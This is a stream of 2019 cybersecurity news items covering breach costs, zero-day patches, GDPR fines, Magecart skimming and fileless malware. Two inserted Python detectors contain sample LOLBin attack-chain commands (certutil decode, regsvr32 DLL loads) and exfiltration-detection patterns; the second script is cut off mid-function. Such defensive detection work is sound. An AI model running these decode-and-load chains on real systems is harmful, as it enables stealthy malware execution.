The report, The Economic Impact of Third-Party Risk Management in Healthcare, surveyed 554 healthcare IT and security professionals and found that these challenges are becoming more costly for healthcare providers, with the yearly hidden costs of managing vendor risk reportedly ringing in at $3.8 million per healthcare provider. On average, each healthcare provider has 1,320 vendors under contract, yet only 36% of respondents said they are able to effectively prioritize vendor risks and only 27% said they assess all of their vendors annually.
That cost from third-party risks is in excess of the $2.9 million that a data breach costs providers; however, the report also stated that over the last two years, 56% of healthcare organizations have experienced a data breach that had been introduced by one or more third-party vendors. As a result, the cost across the healthcare industry is $23.7 billion per year, according to the report.
“This research confirms that healthcare providers require a better, more cost-effective approach to third-party risk management,” said Ed Gaudet, CEO and founder of Censinet. “The adoption of technology in healthcare is more rapid and complicated than ever before. As an industry, we must help providers safely enable cloud applications and medical devices optimized to deliver the quality of care hospitals and their patients expect.”
“It’s clear that healthcare providers are in a tough spot. The number of vendors they rely on is increasing at the same time the threats those vendors pose are escalating in frequency and severity, so it’s easy to see how managing these risks has become an overwhelming problem,” said Dr. Larry Ponemon, chairman and founder of the Ponemon Institute. “But it’s not all bad news – we can very clearly see an opportunity with automation for healthcare providers to monitor, measure and mitigate the scourge of third-party breaches that continues to plague their industry.”
In related news, new research, The State of Healthcare Cybersecurity, from Bugcrowd found that vulnerability submission in the healthcare industry jumped 340.5% over the past year. “While we see an uptick in submissions in Q2 year-on-year, we are on track to see a steady increase in vulnerability again this year. Across programs run by healthcare organizations, more than 12% of all submissions are classified by the organization as P1 submissions, the most critical vulnerabilities, and the majority of the vulnerability submissions fall in the P3 level of criticality, just over 42%,” a Bugcrowd spokesperson wrote in an email.
Cyber-criminals are getting better at monetizing their attacks, with $45bn lost last year alone in two million incidents, according to Internet Society’s Online Trust Alliance (OTA).
The group’s new Cyber Incident & Breach Trends Report comprises information from the FBI, Risk Based Security, the Identity Theft Resource Center and other sources.
It paints the picture of a rapidly maturing cybercrime economy in which both tried-and-tested and emerging techniques are being used in highly effective ways to generate illicit profits for the black hats.
One example of this is ransomware: although overall infections declined 20% from 2017 figures, losses spiked by 60% as attackers focused on higher value business targets.
As reported by the FBI, Business Email Compromise (BEC) has also become a major money-maker for cyber-criminals, netting them $1.3bn in 2018 – double the previous year’s figure.
The report also warned of a 78% increase in digital supply chain attacks of the sort seen with groups using Magecart code to infect e-commerce sites. It claimed that two-thirds of organizations have suffered an attack costing on average $1.1 million, and estimated that half of all cyber-attacks last year involved the supply chain.
Credential stuffing attacks were also highlighted as an urgent threat to address, given figures claiming there were 30bn malicious log-in attempts last year.
On the plus side, there was a 3.2% decrease in reported data breaches last year, and the number of exposed records also dropped in 2018 from the previous year.
Still, the Internet Society claimed that 95% of breaches are preventable. It urged all organizations to put in place a tested incident response plan, to train employees on an ongoing basis and to continually review security, data management and privacy practices.
The report contains a handy checklist for organizations to help them get “incident ready.”
“While it’s tempting to celebrate a decreasing number of breaches overall, the findings of our report are grim,” said Jeff Wilbur, technical director of the Internet Society’s Online Trust Alliance. “Cyber-criminals are using their infiltration ability to focus on new, more lucrative attacks. Staying up-to-date on the latest security safeguards and best practices is crucial to preventing attacks in the future.”
Microsoft patched 77 vulnerabilities yesterday including two zero-day flaws, one of which was being used in a targeted attack bearing the hallmarks of Russian state hackers.
The monthly update round saw Redmond fix privilege escalation vulnerabilities CVE-2019-0880 and CVE-2019-1132.
The latter was discovered by ESET researchers as part of a targeted attack in eastern Europe, using techniques similar to those of the infamous Kremlin-linked group APT28 (aka Fancy Bear, Sednit).
“For example, the Sednit group’s local privilege escalation exploit we analyzed in 2017 used menu objects and exploitation techniques, which are very similar to the current exploit,” ESET researcher Anton Cherepanov explained.
Although, like the other zero-day, it requires an attacker to have already established a presence on the system, it could enable full system access when chained with other flaws.
CVE-2019-0880 is an elevation of privilege vulnerability in splwow64.exe.
“According to the advisory, the vulnerability could be combined with a remote code execution or a separate elevation of privilege vulnerability to gain arbitrary code execution,” explained Tenable senior research engineer, Satnam Narang. “Because it was exploited in the wild, it is likely it was paired with another vulnerability, but those details are not currently available.”
Those two zero-days were rated important. However, there are 15 classed as critical and a further four flaws which had been publicly disclosed in advance, potentially allowing black hats to work on exploits.
“One of the most critical vulnerabilities this month is present in Microsoft DHCP Server (CVE-2019-0785). This memory corruption vulnerability affects all versions of Windows Server from 2012 - 2019 and it is remotely exploitable,” argued Recorded Future senior solutions architect, Allan Liska.
“It allows an attacker to send a specially crafted packet to a DHCP server and, if successful in exploitation, execute arbitrary code. While this is a critical vulnerability, with a CVSS Score of 9.8, a very similar vulnerability, CVE-2019-0725, was announced in May. To date, Recorded Future has not seen any evidence of attackers exploiting this vulnerability in the wild. That does not mean organizations should not prioritize patching this vulnerability.”
Others highlighted by Liska included: RDS remote code execution (RCE) flaw CVE-2019-0887, which affects all versions of Windows from Windows 7-10 and Windows Server 2008-2019; memory corruption bug CVE-2019-1001 which affects Microsoft ChakraCore Scripting Engine, Internet Explorer 11, and Microsoft Edge; and an RCE flaw (CVE-2019-1072) in Azure DevOps Server and Team Foundation Server (TFS).
The NHS has repelled over 11.3 million email-based cyber-attacks over the past three years, highlighting the continued threat to healthcare systems in the UK, according to new Centrify research.
The security company sent Freedom of Information (FOI) requests to NHS Digital in a bid to uncover the true picture of threats to the NHSmail system, which is apparently used by more than 500,000 staff daily.
The majority of attacks were categorized as IP or domain reputation attacks, likely to be phishing attempts, accounting for over half (6.1m). Next came spam (3.6m) and malware-borne attacks (852,000).
Health service IT security teams were famously unprepared for the WannaCry ransomware worm of 2017 which exploited unpatched computers, causing the cancellation of an estimated 19,000 appointments and operations, disrupting a third (34%) of trusts.
That ended up costing the NHS around £92m in lost access to information and systems and emergency IT support – money that the health service can ill afford in an age of government austerity.
Last year, it received a £150m spending boost from central government to cover Windows 10 migration, a Security Operations Center (SOC), network upgrades and fixes for other “infrastructure weaknesses.”
However, the funding is spread out over three years and, whilst welcome, is unlikely to be enough to upgrade the health service’s ageing IT infrastructure – especially given the increasing scrutiny it’s being put under by hackers.
“It’s clear that hackers view the NHS as a top target with growing volumes of email attacks deliberately designed to fool doctors, nurses and other health service workers into handing over confidential data,” said Centrify VP, Andy Heather.
“Increasingly we’re seeing cyber-criminals gaining access to private information like patient records using legitimate log-in details which have been stolen or sold online. All too often this means that malicious activity remains undetected before it’s too late, so it’s vital that hospitals adopt a zero-trust approach to all user activity, ensuring every employee is verified and they are who they say they are.”
The Information Commissioner’s Office has announced an intention to fine Marriott International £99m for “infringements of the GDPR.”
The fine relates to an incident that Marriott reported in November 2018, which saw approximately 339 million guest records exposed globally, of which around 30 million related to residents of 31 countries in the European Economic Area (EEA) and seven million related to UK residents.
Information Commissioner Elizabeth Denham said: “The GDPR makes it clear that organizations must be accountable for the personal data they hold. This can include carrying out proper due diligence when making a corporate acquisition, and putting in place proper accountability measures to assess not only what personal data has been acquired, but also how it is protected.”
In the original breach, Marriott learned during the investigation that there had been unauthorized access to the Starwood network since 2014, where an unauthorized party had copied and encrypted information, and took steps towards removing it. “On November 19, 2018, Marriott was able to decrypt the information and determined that the contents were from the Starwood guest reservation database” its statement said.
The ICO said that Marriott failed to undertake sufficient due diligence when it bought Starwood, and should also have done more to secure its systems. However Marriott has co-operated with the ICO investigation and has made improvements to its security arrangements since these events came to light.
In a statement, Marriott International’s President and CEO, Arne Sorenson, said that the company intended to contest the fine and was “disappointed” with the notice of intent.
Sorenson said: “We deeply regret this incident happened. We take the privacy and security of guest information very seriously and continue to work hard to meet the standard of excellence that our guests expect from Marriott.”
As with yesterday’s announcement of the intention to fine British Airways, Marriott will now have an opportunity to make representations to the ICO as to the proposed findings and sanction.
Denham said: “Personal data has a real value so organizations have a legal duty to ensure its security, just like they would do with any other asset. If that doesn’t happen, we will not hesitate to take strong action when necessary to protect the rights of the public.”
Justin Coker, VP EMEA at Skybox Security, said that a bigger penalty does seem to be sending a message to any firms operating in the UK that are lingering in cybersecurity complacency. “While BA and Marriott have every right to challenge the size of their fines, such a painful levy against such iconic brands should be a landmark catalyst for change and put cyber hygiene and security compliance on every board’s agenda,” he said.
“Whether these companies get their fines adjusted or not, BA and Marriott can use the ICO judgement to take the high ground on knowing the value of proactive cybersecurity and how it can be harnessed to foster customer trust in the long term.”
Small and midsize businesses (SMBs) are more vulnerable to attacks because of their weaknesses in encryption, workload configuration, limited visibility and outdated and unsupported operating systems, according to Alert Logic.
Researchers analyzed more than 1.3 petabytes of data and approximately 8.2 million security events across more than 4,000 organizations of all sizes.
The new report, Critical Watch: SMB Threatscape 2019, found that two-thirds (66%) of SMB devices are running versions of Microsoft OS that will expire by January 2020 or are still running Microsoft OS versions that have expired, the majority of which are over 10 years old. The report also found that over 30% of SMB email servers operate on unsupported software, and almost a third of the top email servers detected were running on Exchange 2000.
For nearly half (42%) of all SMBs, encryption is in some way related to the security issues they face. In addition, vulnerabilities go unpatched by the vast majority (75%) of organizations in the SMB space.
“Our analysis of AWS configuration issues shows that encryption issues affect 33 percent of the SMB instances we scanned. This indicates encryption is not yet an instinctive behavior despite being a best practice and a requirement of many regulations including PCI-DSS, HIPAA, HITECH, GBLA, GDPR, NIST, SOX and state regulations such as CA SB 1386,” the report said.
“The continued lack of skilled cybersecurity professionals affects organizations of all sizes, and small and midsize businesses are at greater disadvantage because they can’t scale like large organizations can,” said Onkar Birk, senior vice president of product strategy and engineering at Alert Logic. “These organizations will greatly benefit from partnering with providers who can augment their limited teams with threat intelligence and experts to be more secure and compliant.”
“Alert Logic’s research confirms that SMBs would benefit from more cost-conscious security options to take some of the responsibility off their shoulders,” continued Birk. “That’s our mission. We aim to bring the level of security traditionally afforded to the Fortune 500 to businesses of any size.”
Almost half of businesses believe cloud apps make them a target for cyber-attacks, according to a survey of 1,050 IT decision makers who participated in Thales’ 2019 Access Management Index.
The report found that 49% of organizations admitted that cloud apps are likely one of the top three reasons their organization might be attacked. Cloud apps followed behind unprotected infrastructure such as IoT devices (54%) and web portals (50%), according to the study.
Across the globe, 75% of IT decision makers said they rely on access management to secure user logins for those employees who externally connect to online corporate resources. However, organizations in the UK are far less likely than the rest of the world (56%) to allow employees to log on to corporate resources using their social media credentials: only 29% of UK companies allow it, almost half the global figure.
Companies around the globe are looking to address cybersecurity issues by hiring strong leadership. In fact, the study found that four in 10 (38%) companies have appointed a CISO due to concerns over the number of breaches occurring in the last 12 months.
“While the UK has been slower to react to the rising number of data breaches by appointing a dedicated CISO, positively it’s ahead of the global average when it comes to using its expertise in the right places,” said Jason Hart, cybersecurity expert at Thales.
Businesses in the UK (19%) are slightly ahead of global organizations (14%) when it comes to empowering the CISO to make final decisions over cloud access management. “Giving CISOs the final decision on cloud access management is the most logical thing because they have the situational awareness to understand the risks facing the business and how to stop it. Many other countries worldwide are falling short of the mark here and leaving themselves exposed in the long run,” Hart said.
In the UK, organizations (63%) are more focused on the potential vulnerabilities posed by unsecured infrastructure than their global counterparts (54%). In fact, 55% of UK businesses would prefer a smart single sign-on (SSO) solution for those accessing the network.
Financial services organizations are suffering from an increased number of phishing attacks, according to a new report Mobile Security in the Financial Services, published by Wandera.
Researchers analyzed 4.7 million events across a subset of devices over a six-month period. For mobile alone, each organization had an approximate average of 21,000 events. The report found that phishing represents 42% of attacks across other industries, significantly lower than the 57% seen in the financial services industry.
“Phishing attacks are a daily threat for financial services companies and employees need regular training to help identify phishing attacks – not only via email, but also through social media and other messaging platforms. However, given the growing sophistication of phishing campaigns, FS companies can’t rely on awareness training as the only layer of defense. A multi-level approach needs to be adopted at the endpoint and in the network to offer comprehensive protection against phishing,” the report said.
The financial services industry is also at a higher risk of man-in-the-middle attacks (36%), a full 12 points higher than the cross-industry threat of 24%. The heightened number of threats could be the result of public WiFi usage as well as higher than normal travel activity, the report said.
According to the report’s figures, for every 20 people in financial services, one individual has their lock screen disabled, with enormous ramifications if the device is lost or stolen. Oddly, though, only 1% of financial services organizations have devices impacted by crypto-jacking, which is lower than the 2.65% detected across other industries.
“In the financial services industry, as in many sectors, the security of client information is the most important asset, so it’s disconcerting to find mobile security still an afterthought,” said Michael Covington, vice president of product strategy at Wandera. “Financial organizations are struggling to keep pace with increasing regulations, rapid cloud migrations and rampant BYOD adoption, among other emerging technology trends, making it crucial that industry security pros work to secure not just the devices, but also the apps installed on them and the data they access."
The UK’s Institute of Information Security Professionals (IISP) has been awarded a prestigious Royal Charter, in a move which could help to attract more people into the industry to combat chronic skills shortages.
The newly named Chartered Institute of Information Security Professionals can now claim to be the authoritative body for the cybersecurity industry in the country. Royal Charters are rarely granted, and only to bodies that are able to prove pre-eminence in their field and who serve the public interest.
Under its new banner, the CIISP will continue its mission to promote knowledge sharing across the profession and develop standards for skills recognition and career development, at home and potentially overseas.
“As the cybersecurity industry continues to grow, professionalization has to be central to its agenda, and the institute’s chartered status will be a key component driving this forward,” said Alastair MacWillson, chair of the Chartered Institute of Information Security Professionals.
“The institute has spent over a decade using uniquely developed frameworks to set standards for skills, experience and roles across the profession and it’s hugely encouraging to see these standards and processes validated by charter incorporation.”
MacWillson also argued that its new status would help the institute encourage more applicants into the industry, which has been suffering from skills shortages for many years.
The global shortfall in information security professionals now stands at nearly three million, including 142,000 in EMEA. Of these, just a quarter (24%) are women.
According to a March Tripwire study, 85% of industry professionals polled claimed their IT security department is already understaffed, with only 1% saying they can manage all of their organization’s cybersecurity needs.
A separate poll for Infosecurity Europe in the same month found that over half (52%) of IT and security professionals believe skills shortages are putting their business at an increased risk of attack.
Microsoft has warned of a new fileless malware attack campaign that completely “lives off the land” in a bid to escape detection.
Andrea Lelli of the computing giant’s Microsoft Defender ATP Research Team first detected the Astaroth campaign after noticing a May-June spike in the use of the Windows Management Instrumentation Command-line (WMIC) tool to run a script.
This is a commonly used technique in fileless malware attacks and so it proved this time, with attackers spreading the info-stealing malware via a spear-phishing link to a .LNK file.
“All the payloads are Base64-encoded and decoded using the Certutil tool. Two of them result in plain DLL files (the others remain encrypted). The Regsvr32 tool is then used to load one of the decoded DLLs, which in turn decrypts and loads other files until the final payload, Astaroth, is injected into the Userinit process.”
During the entire process, no file is run that isn’t a legitimate system tool, which could make it difficult for legacy security solutions to detect.
Heuristics and behavioral monitoring capabilities are key to spotting such fileless threats as they focus on detecting anomalous behavior rather than looking for signatures or executables, Lelli concluded.
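As an added example (not Microsoft’s or ESET’s code), the chain quoted above expressed as behavioral detection logic and run over constructed process-creation events. The `/format:` switch as the sign of WMIC running a script, the 10-minute correlation window and every command line and host name are assumptions.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

@dataclass
class ProcEvent:
    ts: int        # seconds since epoch (constructed values)
    host: str
    image: str     # executable name, e.g. "certutil.exe"
    cmdline: str

# Stage indicators for the chain described above. Treating "/format:" as the
# way WMIC is made to run a script is an assumption of this example.
WMIC_SCRIPT = re.compile(r"/format:", re.I)
CERTUTIL_DECODE = re.compile(r"-decode\s+(\S+)\s+(\S+)", re.I)   # in out
REGSVR32_DLL = re.compile(r"(\S+\.dll)\b", re.I)

WINDOW = 600  # seconds; the chain runs in minutes, so 10 min is generous

def stage_of(ev: ProcEvent) -> Optional[Tuple[str, Optional[str]]]:
    """Classify one event as a chain stage (name, related path) or None."""
    img = ev.image.lower()
    if img == "wmic.exe" and WMIC_SCRIPT.search(ev.cmdline):
        return "wmic_script", None
    if img == "certutil.exe":
        m = CERTUTIL_DECODE.search(ev.cmdline)
        if m:
            return "certutil_decode", m.group(2).lower()  # decoded output
    if img == "regsvr32.exe":
        m = REGSVR32_DLL.search(ev.cmdline)
        if m:
            return "regsvr32_load", m.group(1).lower()    # DLL being loaded
    return None

def detect_lolbin_chain(events: List[ProcEvent]) -> List[dict]:
    """Group stage events per host inside WINDOW; alert on two or more
    distinct stages. Severity is 'high' when regsvr32 loads the very file
    certutil decoded, or when all three stages are present."""
    by_host: Dict[str, list] = {}
    for ev in events:
        s = stage_of(ev)
        if s:
            by_host.setdefault(ev.host, []).append((ev, s))
    alerts = []
    for host, staged in by_host.items():
        staged.sort(key=lambda x: x[0].ts)
        i = 0
        while i < len(staged):
            first_ts = staged[i][0].ts
            stages: Dict[str, list] = {}
            j = i
            while j < len(staged) and staged[j][0].ts - first_ts <= WINDOW:
                ev, (name, path) = staged[j]
                stages.setdefault(name, []).append(path)
                j += 1
            if len(stages) >= 2:
                decoded = set(stages.get("certutil_decode", []))
                loaded = set(stages.get("regsvr32_load", []))
                linked = bool(decoded & loaded)
                alerts.append({
                    "host": host, "first_ts": first_ts,
                    "stages": sorted(stages), "linked": linked,
                    "severity": "high" if linked or len(stages) == 3 else "medium",
                })
            i = j
    return alerts

# Constructed sample telemetry: ws-01 shows the full chain, ws-02 a lone
# (legitimate) certutil decode, ws-03 two stages that are not linked.
SAMPLE_EVENTS = [
    ProcEvent(1000, "ws-01", "wmic.exe", r'wmic os get /format:"stage0.xsl"'),
    ProcEvent(1030, "ws-01", "certutil.exe",
              r"certutil -decode C:\Users\Public\s1.txt C:\Users\Public\s1.dll"),
    ProcEvent(1045, "ws-01", "regsvr32.exe", r"regsvr32 /s C:\Users\Public\s1.dll"),
    ProcEvent(2000, "ws-02", "certutil.exe", r"certutil -decode cert.b64 cert.cer"),
    ProcEvent(3000, "ws-02", "regsvr32.exe", r"regsvr32 /s C:\Vendor\plugin.dll"),
    ProcEvent(4000, "ws-03", "certutil.exe", r"certutil -decode C:\Temp\u.b64 C:\Temp\u.msi"),
    ProcEvent(4200, "ws-03", "regsvr32.exe", r"regsvr32 /s C:\Vendor\plugin.dll"),
]

if __name__ == "__main__":
    for alert in detect_lolbin_chain(SAMPLE_EVENTS):
        print(alert)
```

The window grouping is deliberately coarse; in production the certutil output path to regsvr32 argument link is the signal worth tuning, since it survives renaming of the individual tools’ invocations.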
Fileless malware and “living off the land” techniques have been around for several years, although they’re being used with increasing frequency today.
Malwarebytes claimed that such attacks comprised around 35% of total threats in 2018, and are 10 times more likely to succeed than file-based attacks.
Earlier this year, Trend Micro revealed a massive 819% increase in detections of fileless threats between August 2017 and December 2018. It claimed that sandboxing, as well as monitoring behavioral indicators and traffic, can help the white hats to combat this growing threat.
Over a quarter of UK firms have suffered a ransomware attack over the past year, a major increase on figures from 2016, according to new research released by Databarracks.
The business continuity provider shared data from its upcoming Data Health Check survey, based on interviews with 400 IT decision makers.
It revealed that 28% of UK organizations have been hit by ransomware over the past 12 months. This is slightly lower than the peak of 29% in 2017, the year WannaCry hit, but much higher than the 2016 figure of 16%.
Databarracks managing director, Peter Groucutt, urged firms to formulate effective incident response plans, including recovery from backup.
“A ransomware attack will ultimately leave a business with two decisions: recover your information from a previous backup or pay the ransom. But even if a ransom is paid, it’s not certain your data will be returned. The only way to be fully protected is to have historic backup copies of your data,” he argued.
“When recovering from ransomware, your aims are to minimize both data loss and IT downtime. Outright prevention is not viable, so organizations should focus on organizing their defensive and preventative strategies to reduce the impact of an attack.”
It’s not just the UK that has seen an increase in ransomware attacks of late. In the US, several Florida cities have been hit, with two of them agreeing to pay the hackers hundreds of thousands of dollars to get their data back.
Although ransomware attacks on consumers decreased 33% year-on-year in Q1 2019, those against corporates surged by over 500%, according to Malwarebytes.
“The incident response team must have the authority to make large-scale, operational decisions quickly. This includes being able to take systems offline to prevent the spread of infection,” explained Groucutt.
“Once isolated and contained, you must find when the ransomware installation occurred to be able to restore clean data from before the infection. When the most recent, clean data is identified you can begin a typical recovery, restoring data and testing before bringing systems back online again.”
The Department of Energy (DOE) engaged in conversations with industry partners in order to advance the cybersecurity of industrial control systems in the nation’s critical infrastructure, including power utilities and pipelines, according to FedScoop and E&E News.
“Private entities and key agencies formed a consortium over concerns industrial control systems (ICS) are increasingly being targeted by nation-states, hacktivists and advanced persistent threats, but such incidents aren’t being discussed,” FedScoop reported.
Since meetings took place over a week ago, a team of industry leaders has set to work with the focus of delivering a report and key recommendations by the end of July, according to Jason Haward-Grau, CISO at PAS Global.
“The DOE’s driver is enabling a safer and more secure pipeline infrastructure, there is no expectation that the accountability will change from the TSA,” said Haward-Grau. “The EU response to both the risks and the need to protect the critical infrastructure space is becoming acknowledged as a solid mechanism for governments to build upon their varied security foundations to establish the framework for cybersecurity in the operational security arena. There are more countries (and even states in the US) looking to establish the same principles, practices that are already being deployed in the EU.”
Because nation states continue to openly demonstrate their enhanced cyber offensive capabilities, governments and private industry alike are increasingly concerned about malicious actors targeting critical infrastructure. Because of the nature and importance of ICS, they are high on the list of targets, driving the growing desire to protect it.
“Coupled with the drive toward digitization of the operational technology (OT) end points, the potential attack surface for OT is growing wider and presents a more attractive target as the opportunity to ‘play the odds’ means the defenders have to be 100% successful to keep their environments secure, whereas the attackers just need to get lucky once,” said Haward-Grau.
“There is an increasing challenge in ensuring that we have the right skilled resources available to drive the improved security programs as not only is there a major shortage in IT, there is a lack in OT and the difference between OT and IT is compounding the challenge.”
A malware campaign has been targeting Korean TV torrent websites, according to researchers at ESET.
The malware, which is focused on South Korea, reportedly grants attackers remote control of the compromised devices. Researchers have dubbed the malware, a Win64/GoBot2 variant, GoBotKR; the actors behind it are building a network of bots that can then be used to perform DDoS attacks of various kinds, according to today’s press release.
“The attackers behind this campaign try to trick users into executing the malware by booby-trapping the contents of the torrents with malicious files that have deceptive filenames, extensions and icons,” says ESET researcher Zuzana Hromcová, who analyzed the malware. “Directly opening the intended MP4 file will not result in any malicious action. The catch here is that the MP4 file is often hidden in a different directory, and users might first encounter the malicious file mimicking it.”
Though not very technically complex, the malware collects system information about the compromised computer after being executed. According to the researchers, the information collected includes network configuration, OS version information and CPU and GPU versions along with a list of installed antivirus software.
“This information is sent to a C&C server, which helps the attackers determine which bots should be used in the respective attacks. All C&C servers that we extracted from the analyzed malware samples are hosted in South Korea and registered by the same person,” said Hromcová.
GoBotKR’s evasion techniques are notable from a researcher’s perspective, said Hromcová. One particularly notable technique is that when the malware scans running processes on the compromised system, it self-terminates if any of those security products are detected.
“Overall, the modifications show us that the attackers customized the malware for a specific audience, while taking extra effort to remain undetected in their campaign,” said Hromcová.
Due to “unforeseen circumstances,” Hillary Clinton has reportedly withdrawn her invitation to deliver the keynote speech at the 2019 FireEye Cyber Defense Summit, according to news from the Daily Caller.
Infosecurity has contacted FireEye and Clinton’s office to confirm that the former US secretary of state will no longer be speaking at the cybersecurity event. Clinton is not listed among the 2019 speakers for the event, and a detailed agenda including keynote details is not yet available on the conference website.
Clinton was invited to participate in a Q&A discussion with FireEye CEO, Kevin Mandia, “on the geopolitical landscape and its implications for global cybersecurity today. Secretary Clinton has been a practicing attorney and law professor, an advocate of internet freedom, First Lady, and US Senator from New York, in addition to serving as the 67th United States Secretary of State,” according to a May 30 press release.
“Differences among nations today, driven by friction in geopolitics, economics, security and technology, are having a significant impact on global cyber conflict. Secretary Clinton’s extensive knowledge of foreign policy, her firsthand experience on the front lines of diplomacy, and her understanding of the challenges facing open, democratic societies give her a unique perspective on some of the most pressing conversations shaping our world today,” said Mandia.
The news that Clinton would deliver the keynote address drew much comment on social media, with some expressing ‘laughter’ and others saying they had cancelled their registrations.
“Just cancelled my plans to go to #FireEyeSummit. No way to trust a cyber company that thinks it is a good idea for a govt official that is willing to run a private, unprotected server, out of her home is a keynote speaker. Her disposal techniques are umm,” one person tweeted.
If Clinton has officially withdrawn, the news has remained tightly under wraps. Despite critics expressing their dissatisfaction at the news that she would be speaking, Twitter has remained very quiet since the Daily Caller reported the news on July 4.
Security researchers have discovered another major digital skimming campaign, this time compromising over 960 e-commerce sites in just a day.
Sanguine Security, which produces a malware scanning tool for popular e-commerce software platform Magento, revealed the findings in a tweet on Friday.
It described the discovery as “the largest automated campaign to date” – with 962 sites infected with the infamous Magecart code.
That is well above the previous high of 700 online stores and points to a highly automated operation: the infections took place within a 24-hour period, with victims located around the world.
It’s believed the attacks could be the result of hackers exploiting a vulnerability in Magento.
In March, for example, a critical SQL injection (SQLi) flaw was disclosed that can lead to remote code execution. Although the vendor released a patch, stores that have not applied it remain exposed to attack.
The destructive power of Magecart has been plain to see over recent months. Just today, airline BA was fined over £183m for failing to protect its web infrastructure from a Magecart attack last year, leading to the compromise of personal data on around 500,000 customers.
A flaw of that kind appears to be the entry point here, with an unpatched Magento vulnerability giving the attackers straightforward access to hundreds of stores still running the insecure version of the platform.
Sanguine Security has published the new version of the skimming code on GitHub Gist, although confirmed details of how this latest attack worked have yet to emerge.
Cyber-attacks on UK businesses hit an all-time high in the second quarter of 2019, averaging one every 50 seconds, according to Beaming.
The business ISP analyzed traffic for its customers during the period and found them to be on the receiving end of 146,491 attempted attacks each, on average. That’s 179% higher than the same period in 2018, when firms faced down 52,596 attacks on average.
IoT devices and file sharing services were most frequently targeted, hit by 17,737 and 10,192 attacks respectively during the quarter.
This chimes somewhat with a FireEye report from last month which revealed a dramatic increase in email attacks that use file-sharing services to deliver malware. From featuring in hardly any such attacks in Q4 2018, OneDrive was seen in over 60% of them by Q1 2019, it claimed.
Attackers often host phishing payloads on file-sharing services because links to those well-known domains pass the initial domain reputation checks made by security tools.
Beaming also identified over 371,000 unique IP addresses used to launch cyber-attacks in Q2 2019: a plurality were traced back to China, with significant activity also originating in Taiwan, Brazil, Egypt and the US.
However, this is more of an indication of where the most compromised PCs are, rather than necessarily the geographical location of the attackers themselves.
Beaming managing director, Sonia Blizzard, argued that companies of all sizes are under attack.
“The majority of cyber-attacks on businesses are indiscriminate, malicious code that trawls the web seeking to exploit any weak point in cybersecurity systems. A single breach can be catastrophic to those involved,” she added.
“We do lots at a network level to minimize the threat of online attacks, but businesses need to take the threat seriously, educate employees and put in place measures such as managed firewalls to ensure they don’t expose themselves to undue risk.”
The Anti-Fraud Technology Benchmarking Report assessed data from more than 1000 members of the Association of Certified Fraud Examiners (ACFE) regarding their organizations’ use of technology to fight fraud. It found that while only 13% of businesses currently use AI and machine learning to detect or deter fraudulent activity, another 25% plan to do so in the next year or two.
Other key findings discovered that 26% of organizations are using biometrics as part of their anti-fraud programs, with another 16% expecting to deploy biometrics by 2021, while more than half of respondents (55%) plan to increase their anti-fraud tech budgets over the next two years.
“As criminals find new ways to exploit technology to commit schemes and target victims, anti-fraud professionals must likewise adopt more advanced technologies to stop them,” said Bruce Dorris, JD, CFE, CPA, president and CEO of the ACFE. “However, which technologies are most effective in helping organizations manage rising fraud risks? The answer to this question can be crucial in successfully implementing new anti-fraud technologies.”
Laurent Colombant, continuous controls and fraud manager at SAS, added: “The tools available for fraud prevention are now more intelligent than ever. We’re no longer restricted to merely reacting to fraud after it happens – with the right AI-enabled tools in place, anti-fraud teams can now begin to intelligently predict potential danger spots and flag up early warning signs to ensure efforts are co-ordinated and effective.
“The emergence of AI, machine learning and predictive modelling is helping investigators to pre-emptively detect fraudulent activity, allowing them to stay ahead of the increasingly sophisticated techniques being employed by criminals.”
British Airways (BA) has been hit by a record £183m GDPR fine after failing to prevent a digital skimming attack last year.
UK regulator the Information Commissioner’s Office (ICO) said the £183.39m penalty was levied due to “poor security arrangements” at the carrier, leading to the compromise of personal data on around half a million customers.
“People’s personal data is just that – personal. When an organization fails to protect it from loss, damage or theft it is more than an inconvenience,” said information commissioner, Elizabeth Denham.
“That’s why the law is clear – when you are entrusted with personal data you must look after it. Those that don’t will face scrutiny from my office to check they have taken appropriate steps to protect fundamental privacy rights.”
The fine is the biggest ever levied by the ICO, publicly at least, but still amounts only to around 1.5% of the airline’s global annual turnover as of 2017 – far less than the maximum 4% allowable.
That said, BA will be appealing to the ICO. Chairman and CEO, Alex Cruz, claimed the company responded quickly to the incident and that it has found “no evidence” of the data being used in follow-on fraud.
However, security researchers claimed to have found the stolen personal information up for sale online just a week after the incident.
The attack involved an increasingly popular form of digital skimming code known as Magecart, which was injected covertly into the BA website to harvest customers’ card details as they were entered, without their knowledge.
The data stolen included log-in, payment card and travel booking details as well as name and address information, according to the ICO.
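Both the 962-store campaign above and the BA breach come down to the same thing: a script that was not there yesterday, or an inline script that reads payment fields and talks to a host the site does not own. The following is an added example, not code from Infosecurity, BA, or Sanguine Security's scanner, of a baseline check a site owner can run against their own checkout page. It parses the page's `<script>` tags, flags external scripts loading from hosts outside an allowlist, and flags inline scripts that both touch payment-looking fields and contain an outbound request to an unlisted host. The hostnames (`shop.example`, `cdn.shop.example`, `static-cdn.example`, `collect.example`) and both HTML pages are constructed for the demo; the field-name and exfiltration patterns are illustrative heuristics, not a signature for any particular skimmer.

```python
"""Baseline check for Magecart-style script injection on a checkout page.

Added example: not from the article or any vendor tool. All hosts and HTML
below are constructed for the demonstration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Heuristics (assumptions, not a signature): names a skimmer typically reads,
# and JavaScript constructs typically used to send data out of the page.
PAYMENT_FIELD_RE = re.compile(r"(card|cc[_-]?num|cvv|cvc|expir|billing)", re.I)
EXFIL_RE = re.compile(r"(XMLHttpRequest|fetch\(|sendBeacon|new Image|\.src\s*=)", re.I)
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


class ScriptCollector(HTMLParser):
    """Collects every <script> tag as (src attribute or None, inline body)."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._src = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._in_script = True
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.scripts.append((self._src, "".join(self._buf)))
            self._in_script = False


def script_host(src, page_host):
    """Host a script src resolves to; relative paths belong to the page itself."""
    host = urlparse(src).netloc
    return host.lower() if host else page_host


def audit_page(html, page_host, allowed_hosts):
    """Return a list of (finding, detail) tuples; an empty list means clean."""
    allowed = {h.lower() for h in allowed_hosts}
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src, body in parser.scripts:
        if src:
            host = script_host(src, page_host)
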